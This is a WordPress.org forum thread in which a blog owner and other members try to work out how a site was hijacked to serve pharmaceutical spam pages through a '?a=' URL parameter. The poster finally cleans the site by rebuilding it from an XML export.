WordPress.org

Ready to get started?Download WordPress

Forums

What is this hack? (11 posts)

  1. shacker
    Member
    Posted 6 years ago #

    One of my users blogs has been hacked or spammed in an interesting way. The following URL is accessible on their blog:

    http://domain.com/?a=buy-drug-name

    If I alter the request, like:

    http://domain.com/?a=buy-drug-namez

    I get a 404 that is NOT served by my server:

    Not Found

    The requested URL /files/buy-cialisz.html was not found on this server.
    Apache/2.0.59 (FreeBSD) mod_ssl/2.0.59 OpenSSL/0.9.7e-p1 mod_perl/2.0.3 Perl/v5.8.8 Server at feed2.pills-searches.com Port 80

    How is this hack working, and what can I do to fix it?

    Thanks much.

    The blog is up to date with 2.2.2. What mechanism in WP uses URLs with this format? Anyone know how this hack might have occurred?

  2. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    Look closely at their .htaccess file.

    Without the real URL to examine the output from, I can't say for certain, but I'm betting that it's just redirecting to this other server.

    "?a=" in specific is not used by WordPress, to my knowledge.

  3. whooami
    Member
    Posted 6 years ago #

    Server at feed2.pills-searches.com

    uh?

  4. whooami
    Member
    Posted 6 years ago #

    Edited: im a fruit.

  5. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    whooami: I think the site that was hacked is redirecting to this feeds pills thing. This is unlikely to be the site he's talking about.

  6. whooami
    Member
    Posted 6 years ago #

    oops, Ive edited this -- my own reading skills apparantly suck today.

    Never mind me.

  7. shacker
    Member
    Posted 6 years ago #

    Otto - .htaccess was the first place I looked, and it's pristine. No redirection going on there. And there are no other .htaccess files up the file tree to the docroot. I've also grepped the httpd.conf files for "pills" but there's no trace.

    Doesn't WP also have its own built-in redirection mechanism? I'm wondering whether that's in play here (as I can't think of any other way for redirection to occur). Anywhere else you can think of in a WP install that might handle or manage redirection?

    Thanks.

  8. shacker
    Member
    Posted 6 years ago #

    Upgraded to 2.3 - the hack persists. Deactivated all plugins - the hack persists.

    This is a serious, and very mysterious hack. Am I really the only person experiencing this?

  9. whooami
    Member
    Posted 6 years ago #

    upgraded .. how ?

    did you delete ALL of the files prior to?

    Its highly unlikely that something attributable to WordPress is going to exist across versions.

    So you look in the files that you didn't replace -- namely theme files, wp-config.php, wp-settings.php perhaps..

    Second, you remove your .htaccess(s)

  10. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    This is a serious, and very mysterious hack. Am I really the only person experiencing this?

    Yes, you are.

    And nobody can look at your code for you. If the functionality exists, then it exists on the site.

    Nobody can say how it works without examining the site in detail.

  11. shacker
    Member
    Posted 6 years ago #

    Yes, you are.

    I don't believe that - this was clearly a well-executed exploit of some known issue. I may be the only person looking at this thread having this experience, but definitely not the only person. This hack was too well-crafted.

    And nobody can look at your code for you. If the functionality exists, then it exists on the site.

    I don't expect anyone to look at my code! I'm just looking for tips on where else to look, since I've tried all of the obvious things. That's what communities are for.

    OK, an update: Since I had grepped everything every which way to Sunday, I dropped all Akismet spam, did a mysqldump, and searched that for the terms in question. I found them in a VERY long INSERT INTO wp_options statement, connected with Magpie RSS. The blog in question is using the RSS module for sidebar widgets, so I'm wondering whether there could have been an exploit in that. Anyway, that gave me a clue, so I found every row in the table that mentioned Magpie and deleted them. Was sure that would fix it, but nope - the problem persisted.

    Then I thought there must be an RSS cache somewhere, but could not find one.

    Finally I backed up the DB, did an XML export, moved the install out of the way, dropped the db, and started over. After importing the XML into a fresh copy of WP, the problem went away. This means one of two things: A) The problem was in a file that the 2.3 upgrade didn't touch (and that was grep resistant) or B) the problem data was still in the database, but obfuscated so as to not be searchable. And it must have been some data that the XML exporter didn't export.

    So now the blog is clean again. I've changed the mysql password, and am not using the RSS sidebar widgets until I find out more. But I'm having trouble finding out more - just can't find a reference to this problem anywhere. Very weird.

    Scot

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags